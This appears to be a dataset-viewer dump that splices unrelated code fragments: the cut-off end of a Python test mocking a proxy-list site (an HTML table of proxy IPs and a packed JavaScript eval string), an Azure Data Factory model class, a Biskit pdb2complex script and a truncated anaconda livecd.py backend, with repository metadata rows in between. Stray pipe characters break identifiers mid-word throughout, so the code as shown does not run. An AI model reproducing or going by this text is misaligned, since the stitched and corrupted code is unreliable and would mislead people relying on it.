\n
<th><dfn title="City or State\\Region ">City</dfn></th>
\n
<th><dfn title="Internet Service Provider">ISP</dfn></th>
\n
</tr>
\n
<div id="navbar">
<ul class="pagination"><li class="active"><a href="/list/">1</a></li><li><a href="02.htm">2</a></li></ul>
</div>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="191.252.61.28|r60e6"></span>191.252.61.28:<span class="r60e6"></span></td>
<td data-label="Anonymity Type: ">high-anonymous</td>
<td data-label="Checked: ">Apr-18, 17:18</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: ">S\xe3o Jos\xe9 Dos Campos</td>
<td data-label="ISP: "><dfn title="Locaweb Servi\xe7os de Internet S/A">Locaweb
Servi\xe7o...</dfn></td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="167.114.203.141|r63c5"></span>167.114.203.141:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">transparent</td>
<td data-label="Checked: ">Apr-18, 13:22</td>
<td data-label="Country: ">Canada</td>
<td data-label="City: ">Montr\xe9al (QC)</td>
<td data-label="ISP: ">OVH Hosting</td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="152.251.141.93|r63c5"></span>152.251.141.93:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">elite </td>
<td data-label="Checked: ">Jul-16, 04:39</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: "> </td>
<td data-label="ISP: ">Vivo</td>
</tr>
\n
<tr><td colspan="6"><span><input type="checkbox" name="" value="" onclick="checkAll(this)"></span>Select All Proxies</td></tr>
</div>"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com', path='/js/test.js', method='get', scheme='https')
def prem_js_mock(url, request):
return b"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};" \
b"if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};" \
b"while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('$(t).u(v(){$(\\'.s\\').0(r);" \
b"$(\\'.n\\').0(o);$(\\'.p\\').0(q);$(\\'.w\\').0(x);$(\\'.D\\').0(E);$(\\'.F\\').0(C);$(\\'.B\\').0(y);$(\\'.z\\').0(A);" \
b"$(\\'.m\\').0(i);$(\\'.7\\').0(8);$(\\'.9\\').0(6);$(\\'.4\\').0(1);$(\\'.2\\').0(5);$(\\'.3\\').0(a);$(\\'.l\\').0(b);" \
b"$(\\'.j\\').0(k);$(\\'.h\\').0(g);$(\\'.c\\').0(d);$(\\'.e\\').0(f);$( |
AutorestCI/azure-sdk-for-python | azure-mgmt-datafactory/azure/mgmt/datafactory/models/self_hosted_integration_runtime_node.py | Python | mit | 6,083 | 0.000329 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SelfHostedIntegrationRuntimeNode(Model):
"""Properties of Self-hosted integration runtime node.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar node_name: Name of the integration runtime node.
:vartype node_name: str
:ivar machine_name: Machine name of the integration runtime node.
:vartype machine_name: str
:ivar host_service_uri: URI for the host machine of the integration
runtime.
:vartype host_service_uri: | str
:ivar status: Status of the integration runtime node. Possible values
include: 'NeedRegistration', 'Online', 'Limited', 'Offline', 'Upgrading',
'Initializing', 'InitializeFailed'
:vartype status: | str or
~azure.mgmt.datafactory.models.SelfHostedIntegrationRuntimeNodeStatus
:ivar capabilities: The integration runtime capabilities dictionary
:vartype capabilities: dict[str, str]
:ivar version_status: Status of the integration runtime node version.
:vartype version_status: str
:ivar version: Version of the integration runtime node.
:vartype version: str
:ivar register_time: The time at which the integration runtime node was
registered in ISO8601 format.
:vartype register_time: datetime
:ivar last_connect_time: The most recent time at which the integration
runtime was connected in ISO8601 format.
:vartype last_connect_time: datetime
:ivar expiry_time: The time at which the integration runtime will expire
in ISO8601 format.
:vartype expiry_time: datetime
:ivar last_start_time: The time the node last started up.
:vartype last_start_time: datetime
:ivar last_stop_time: The integration runtime node last stop time.
:vartype last_stop_time: datetime
:ivar last_update_result: The result of the last integration runtime node
update. Possible values include: 'Succeed', 'Fail'
:vartype last_update_result: str or
~azure.mgmt.datafactory.models.IntegrationRuntimeUpdateResult
:ivar last_start_update_time: The last time for the integration runtime
node update start.
:vartype last_start_update_time: datetime
:ivar last_end_update_time: The last time for the integration runtime node
update end.
:vartype last_end_update_time: datetime
:ivar is_active_dispatcher: Indicates whether this node is the active
dispatcher for integration runtime requests.
:vartype is_active_dispatcher: bool
:ivar concurrent_jobs_limit: Maximum concurrent jobs on the integration
runtime node.
:vartype concurrent_jobs_limit: int
:ivar max_concurrent_jobs: The maximum concurrent jobs in this integration
runtime.
:vartype max_concurrent_jobs: int
"""
_validation = {
'node_name': {'readonly': True},
'machine_name': {'readonly': True},
'host_service_uri': {'readonly': True},
'status': {'readonly': True},
'capabilities': {'readonly': True},
'version_status': {'readonly': True},
'version': {'readonly': True},
'register_time': {'readonly': True},
'last_connect_time': {'readonly': True},
'expiry_time': {'readonly': True},
'last_start_time': {'readonly': True},
'last_stop_time': {'readonly': True},
'last_update_result': {'readonly': True},
'last_start_update_time': {'readonly': True},
'last_end_update_time': {'readonly': True},
'is_active_dispatcher': {'readonly': True},
'concurrent_jobs_limit': {'readonly': True},
'max_concurrent_jobs': {'readonly': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
'machine_name': {'key': 'machineName', 'type': 'str'},
'host_service_uri': {'key': 'hostServiceUri', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'capabilities': {'key': 'capabilities', 'type': '{str}'},
'version_status': {'key': 'versionStatus', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'register_time': {'key': 'registerTime', 'type': 'iso-8601'},
'last_connect_time': {'key': 'lastConnectTime', 'type': 'iso-8601'},
'expiry_time': {'key': 'expiryTime', 'type': 'iso-8601'},
'last_start_time': {'key': 'lastStartTime', 'type': 'iso-8601'},
'last_stop_time': {'key': 'lastStopTime', 'type': 'iso-8601'},
'last_update_result': {'key': 'lastUpdateResult', 'type': 'str'},
'last_start_update_time': {'key': 'lastStartUpdateTime', 'type': 'iso-8601'},
'last_end_update_time': {'key': 'lastEndUpdateTime', 'type': 'iso-8601'},
'is_active_dispatcher': {'key': 'isActiveDispatcher', 'type': 'bool'},
'concurrent_jobs_limit': {'key': 'concurrentJobsLimit', 'type': 'int'},
'max_concurrent_jobs': {'key': 'maxConcurrentJobs', 'type': 'int'},
}
def __init__(self):
self.node_name = None
self.machine_name = None
self.host_service_uri = None
self.status = None
self.capabilities = None
self.version_status = None
self.version = None
self.register_time = None
self.last_connect_time = None
self.expiry_time = None
self.last_start_time = None
self.last_stop_time = None
self.last_update_result = None
self.last_start_update_time = None
self.last_end_update_time = None
self.is_active_dispatcher = None
self.concurrent_jobs_limit = None
self.max_concurrent_jobs = None
|
graik/biskit | archive_biskit2/scripts/Dock/pdb2complex.py | Python | gpl-3.0 | 2,397 | 0.0267 | #!/usr/bin/env python
##
## Biskit, a toolkit for the manipulation of macromolecular structures
## Copyright (C) 2004-2018 Raik Gruenberg & Johan Leckner
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You find a copy of the GNU General Public License in the file
## license.txt along with this program; if not, write to the Free
## Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##
##
##
import sys
import Biskit.tools as T
from Biskit import PDBModel
from Biskit.Dock import | Complex as ProteinComplex
def _use( options ):
print """
pdb2complex.py - create a reference Complex (without waters)
Syntax: pdb2complex.py -c |complex pdb|
| -r |chain index| -l |chain index|
-o |output name|
Options: -c complex pdb file or pickled PDBModel object
-r receptor chain list (e.g. 0 1 )
-l ligand ~ (e.g. 2 )
-o output file
-lo,lr ligand, receptor model output file
Default options:
"""
for key, value in options.items():
print "\t-",key, "\t",value
sys.exit(0)
### MAIN ###
############
options = T.cmdDict( {'o':'ref.complex', 'lo':'lig.model', 'ro':'rec.model' } )
if len (sys.argv) < 3:
_use( options )
## create a reference complex
print "Loading..."
ref_com = PDBModel( options['c'] )
print "Removing water..."
ref_com.remove( lambda a: a['residue_name'] in ['TIP3','HOH','WAT'] )
## extract rec and lig chains
rec_chains = T.toIntList( options['r'] )
lig_chains = T.toIntList( options['l'] )
print "Extracting rec and lig..."
ref_rec = ref_com.takeChains( rec_chains )
ref_lig = ref_com.takeChains( lig_chains )
## create Protein complex
com = ProteinComplex( ref_rec, ref_lig )
print "Saving..."
ref_lig.saveAs( T.absfile( options['lo'] ) )
ref_rec.saveAs( T.absfile( options['ro'] ) )
T.dump( com, T.absfile( options['o']) )
|
icomfort/anaconda | livecd.py | Python | gpl-2.0 | 17,872 | 0.003637 | #
# livecd.py: An anaconda backend to do an install from a live CD image
#
# The basic idea is that with a live CD, we already have an install
# and should be able to just copy those bits over to the disk. So we dd
# the image, move things to the "right" filesystem as needed, and then
# resize the rootfs to the size of its container.
#
# Copyright (C) 2007 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author(s): Jeremy Katz <katzj@redhat.com>
#
import os, sys
import stat
import shutil
import time
import subprocess
import storage
import selinux
from flags import flags
from constants import *
import gettext
_ = lambda x: gettext.ldgettext("anaconda", x)
import backend
import isys
import iutil
import packages
import logging
log = logging.getLogger("anaconda")
class Error(EnvironmentError):
pass
def copytree(src, dst, symlinks=False, preserveOwner=False,
preserveSelinux=False):
def tryChown(src, dest):
try:
os.chown(dest, os.stat(src)[stat.ST_UID], os.stat(src)[stat.ST_GID])
except OverflowError:
log.error("Could not set owner and group on file %s" % dest)
def trySetfilecon(src, dest):
try:
selinux.lsetfilecon(dest, selinux.lgetfilecon(src)[1])
except:
log.error("Could not set selinux context on file %s" % dest)
# copy of shutil.copytree which doesn't require dst to not exist
# and which also has options to preserve the owner and selinux contexts
names = os.listdir(src)
if not os.path.isdir(dst):
| os.makedirs(dst)
errors = []
for name in name | s:
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
if preserveSelinux:
trySetfilecon(srcname, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, preserveOwner, preserveSelinux)
else:
shutil.copyfile(srcname, dstname)
if preserveOwner:
tryChown(srcname, dstname)
if preserveSelinux:
trySetfilecon(srcname, dstname)
shutil.copystat(srcname, dstname)
except (IOError, os.error), why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error, err:
errors.extend(err.args[0])
try:
if preserveOwner:
tryChown(src, dst)
if preserveSelinux:
trySetfilecon(src, dst)
shutil.copystat(src, dst)
except OSError as e:
errors.extend((src, dst, e.strerror))
if errors:
raise Error, errors
class LiveCDCopyBackend(backend.AnacondaBackend):
def __init__(self, anaconda):
backend.AnacondaBackend.__init__(self, anaconda)
flags.livecdInstall = True
self.supportsUpgrades = False
self.supportsPackageSelection = False
self.skipFormatRoot = True
self.osimg = anaconda.methodstr[8:]
if not stat.S_ISBLK(os.stat(self.osimg)[stat.ST_MODE]):
anaconda.intf.messageWindow(_("Unable to find image"),
_("The given location isn't a valid %s "
"live CD to use as an installation source.")
%(productName,), type = "custom",
custom_icon="error",
custom_buttons=[_("Exit installer")])
sys.exit(0)
self.rootFsType = isys.readFSType(self.osimg)
def _getLiveBlockDevice(self):
return os.path.normpath(self.osimg)
def _getLiveSize(self):
def parseField(output, field):
for line in output.split("\n"):
if line.startswith(field + ":"):
return line[len(field) + 1:].strip()
raise KeyError("Failed to find field '%s' in output" % field)
output = subprocess.Popen(['/sbin/dumpe2fs', '-h', self.osimg],
stdout=subprocess.PIPE,
stderr=open('/dev/null', 'w')
).communicate()[0]
blkcnt = int(parseField(output, "Block count"))
blksize = int(parseField(output, "Block size"))
return blkcnt * blksize
def _getLiveSizeMB(self):
return self._getLiveSize() / 1048576
def _unmountNonFstabDirs(self, anaconda):
# unmount things that aren't listed in /etc/fstab. *sigh*
dirs = []
if flags.selinux:
dirs.append("/selinux")
for dir in dirs:
try:
isys.umount("%s/%s" %(anaconda.rootPath,dir), removeDir = False)
except Exception, e:
log.error("unable to unmount %s: %s" %(dir, e))
def postAction(self, anaconda):
self._unmountNonFstabDirs(anaconda)
try:
anaconda.id.storage.umountFilesystems(swapoff = False)
os.rmdir(anaconda.rootPath)
except Exception, e:
log.error("Unable to unmount filesystems: %s" % e)
def doPreInstall(self, anaconda):
if anaconda.dir == DISPATCH_BACK:
self._unmountNonFstabDirs(anaconda)
return
anaconda.id.storage.umountFilesystems(swapoff = False)
def doInstall(self, anaconda):
log.info("Preparing to install packages")
progress = anaconda.id.instProgress
progress.set_label(_("Copying live image to hard drive."))
progress.processEvents()
osimg = self._getLiveBlockDevice() # the real image
osfd = os.open(osimg, os.O_RDONLY)
rootDevice = anaconda.id.storage.rootDevice
rootDevice.setup()
rootfd = os.open(rootDevice.path, os.O_WRONLY)
readamt = 1024 * 1024 * 8 # 8 megs at a time
size = self._getLiveSize()
copied = 0
while copied < size:
try:
buf = os.read(osfd, readamt)
written = os.write(rootfd, buf)
except:
rc = anaconda.intf.messageWindow(_("Error"),
_("There was an error installing the live image to "
"your hard drive. This could be due to bad media. "
"Please verify your installation media.\n\nIf you "
"exit, your system will be left in an inconsistent "
"state that will require reinstallation."),
type="custom", custom_icon="error",
custom_buttons=[_("_Exit installer"), _("_Retry")])
if rc == 0:
sys.exit(0)
else:
os.lseek(osfd, 0, 0)
os.lseek(rootfd, 0, 0)
copied = 0
continue
if (written < readamt) and (written < len(buf)):
raise RuntimeError, "error copying filesystem!"
copied += written
progress.set_fraction(pct = copied / float(size))
progress.processEvents()
os.close(osfd)
os.close(rootfd)
anaconda.id.instProgress = None
def _doFilesystemMangling(self, anaconda):
log.info("doing post-install fs mangling")
wait |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.